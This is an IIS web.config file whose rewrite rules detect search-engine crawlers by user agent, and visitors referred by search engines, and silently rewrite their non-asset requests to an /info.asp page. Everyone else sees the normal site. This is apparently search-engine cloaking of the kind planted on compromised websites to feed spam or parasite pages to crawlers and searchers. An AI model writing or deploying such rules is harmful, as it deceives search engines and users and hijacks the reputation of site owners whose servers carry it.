<?xml version="1.0" ?>
<configuration>
    <system.webServer>
        <rewrite>
            <rules>
                <rule name="Rewrite rule" stopProcessing="true">
                    <match url=".*" />
                    <conditions logicalGrouping="MatchAll">
                        <add input="{REQUEST_URI}" pattern="\.(gif|bmp|js|css|jpg|jepg|png|gif|xls|rar|doc|swf|fla|zip|ico|txt|pdf|mp3|mp4|webm|wav|ogg|rar|7z|woff|ttf|xlsx)$" negate="true" ignoreCase="true" />
                        <add input="{HTTP_USER_AGENT}" pattern="(google|bing|yahoo|baidu|spider|bot|spider)" ignoreCase="true" />
                    </conditions>
                    <action type="Rewrite" url="/info.asp?{R:0}" />
                </rule>
                <rule name="Rewrite to 1.asp for Referer" stopProcessing="true">
                    <match url=".*" />
                    <conditions logicalGrouping="MatchAll">
                        <add input="{REQUEST_URI}" pattern="\.(gif|bmp|js|css|jpg|jepg|png|gif|xls|rar|doc|swf|fla|zip|ico|txt|pdf|mp3|mp4|webm|wav|ogg|rar|7z|woff|ttf|xlsx)$" negate="true" ignoreCase="true" />
                        <add input="{HTTP_REFERER}" pattern="(google|baidu|bing|yahoo)" ignoreCase="true" />
                    </conditions>
                    <action type="Rewrite" url="/info.asp?{R:0}"  />
                </rule>
            </rules>
        </rewrite>
    </system.webServer>
</configuration>